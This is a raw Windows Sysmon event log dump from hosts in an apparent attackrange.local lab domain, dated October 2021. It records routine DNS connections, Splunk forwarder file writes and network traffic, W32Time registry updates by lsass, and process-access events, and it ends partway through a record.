08:02:18.027{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50431- 354300x8000000000000000107630Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:18.024{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52829- 23542300x800000000000000083500Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:19.055{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=BA0BE50AA6C9A55AD8D5396079492113,SHA256=0DD1912CD64EB0F01959749C1A1ABB7EB9680060233F5848DB9F3BC6B54A40A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107642Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:20.991{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BB4ABC1B02FBB466D04F112EE4AFE36,SHA256=4FEEE93B1A10C9BD85DE158578667F2E89893CAFB2DD10821397772944D3B38D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083502Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:20.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86F756A152A201466CDA1F8DF6F2E019,SHA256=EA3A83DF90C6914947FFD9F1E34C8AE03A814C99360A506255666E6E08CE5B3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083503Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:21.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=126E7643A55E948D0219730D1335EA1B,SHA256=E0338143EA79017F418C15646E5581C4EA0CD52D5DEF3F02002E71727233B208,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083504Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:22.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65B6F486703C1F59BE6D4AC1AF846F15,SHA256=4906EDE03E6D0D7C0688BBB242221736025B23284050299F562C863BCF01C1BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107643Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:22.022{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3895A626E5AECD25C397D373FE15AFB,SHA256=5E30FCD79B6A3298B2AC88489FA3F5025810E063C161FF0F0E373785C335FFC3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083506Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:21.705{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50175-false10.0.1.12-8000- 23542300x800000000000000083505Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:23.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B41B51B74F012AC4EA95C4A2B9933C5,SHA256=FEC135701716418036B639FDC8337CF852ED1D0C39101088753993E9AF9A3D8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107645Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:21.419{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51922-false10.0.1.12-8000- 23542300x8000000000000000107644Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:23.038{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4068B676F89AA8B25C43600D7B2F268D,SHA256=C0EEE18E5622651BE8D1950AC2F13F652A4A0659072E61BDD2CA62C557D0823F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083507Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:24.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=941B2A0E04F20ECC643441320968834B,SHA256=5B4DEBF40268610FD025735C425995C094375A9DCC2AD765B7F2B7608438E59C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107646Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:24.057{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0F4342D97B1471656E8D68BD825CEFC,SHA256=F8758AB5259C3D73712443623233386C1201E29FD5083E6DDF7FD5AC680710A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083508Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:25.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=557A0F0B949FA8186F651833D0CBF39A,SHA256=D8DF166AC06AF2608819660F8ECEB7D77D0C59255BA1144059268C204BFD23A3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000107657Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:25.604{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000107656Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:25.604{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0021af4a) 13241300x8000000000000000107655Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:25.604{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8ed-0xc946ed55) 13241300x8000000000000000107654Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:25.604{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f6-0x2b0b5555) 13241300x8000000000000000107653Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:25.604{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fe-0x8ccfbd55) 13241300x8000000000000000107652Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:25.604{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000107651Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:25.604{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0021af4a) 13241300x8000000000000000107650Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:25.604{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b8ed-0xc946ed55) 13241300x8000000000000000107649Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:25.604{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b8f6-0x2b0b5555) 13241300x8000000000000000107648Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:02:25.604{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b8fe-0x8ccfbd55) 23542300x8000000000000000107647Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:25.058{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9D4A2644A912188EE34AC9BF7E40566,SHA256=EF50A0D4F78993F9B65605D9DE8AF40F3635E5A2A562D61DB9619DD392D7C21D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083509Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:26.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD5BF6721052F37A72301CBEBFF197BA,SHA256=A658C69B48C5B5D73BD001E0EB8C06C502D41B0801ECEDBBA1BDA7479E0B09DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107658Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:26.119{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A4AA91F3E682083C17F4550991D4985,SHA256=DCA39361089E7F4BAA7C829EA5A93844D3E79E80DAEC5B92C29C8D1FEA0EA71B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083510Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:27.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B557E8F5CFB72AAC880F30826978674,SHA256=628C63843811EBD5EEB3EB8F4AEEACD70ABEB5D890CA462627616A433EA5E733,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107659Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:27.156{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCA5173FBF9309C735869F1E301D2CE3,SHA256=65D59C3E34E0F24C8DF1FCB3E1179442E1B480427A0321D3F156BD717399E285,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083511Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:28.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A1BD1EF01C96ADA346E4E64C6EEC150,SHA256=0D754A9CF9300DAFF4BBEA360AC95528F97F76D9F370E8030456B427A4D5E1CC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107661Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:27.431{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51923-false10.0.1.12-8000- 23542300x8000000000000000107660Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:28.171{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1D63CC9605177EFC7E6D99E18D2760D,SHA256=5BCF9A17BF28A0D7E5E5E95204EE9AF78019C703059DA63AE2E63DC6AE4ECD64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107662Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.202{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC607700A4463603A9CDF79CEEFAB80F,SHA256=C9D753A377E0653CE78E5665CBD133E4F29F8AACDBF785D900109B704C42FD28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083514Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:29.883{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083513Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:27.579{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50176-false10.0.1.12-8000- 23542300x800000000000000083512Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:29.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3481317970D77F2E0D5877D9F91D863A,SHA256=42624049964547A214B48C9742D69B7D6E672EFA6EBEF1134E05034E43C10A35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083515Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:30.430{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3975C573AB10376332A93486332BB38C,SHA256=0A1FAF59464CE04D256A95270509A65B8E305D7C6D9312B3C839E917C72F4E66,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107674Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.048{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64636- 354300x8000000000000000107673Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.047{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local62487- 354300x8000000000000000107672Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.046{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64202- 354300x8000000000000000107671Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.045{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local63838- 354300x8000000000000000107670Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.044{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60623- 354300x8000000000000000107669Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.043{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local58188- 354300x8000000000000000107668Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.042{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60650- 354300x8000000000000000107667Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.041{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51222- 354300x8000000000000000107666Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.039{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local60719- 354300x8000000000000000107665Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.030{58E9C193-ACA7-615A-0D00-00000000FC01}896C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51924-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 354300x8000000000000000107664Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:29.030{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51924-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 23542300x8000000000000000107663Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:30.234{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=068EDA8F4BB4444B48C9C182C65ADFA3,SHA256=EBF43923544365AAB9E90BFC69016C5DD71B4D739C7392B44A3E923F54FAD1CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083543Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.899{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B517-615A-9701-00000000FD01}1760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083542Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.899{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083541Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.899{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083540Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.899{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083539Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:31.899{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083538Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 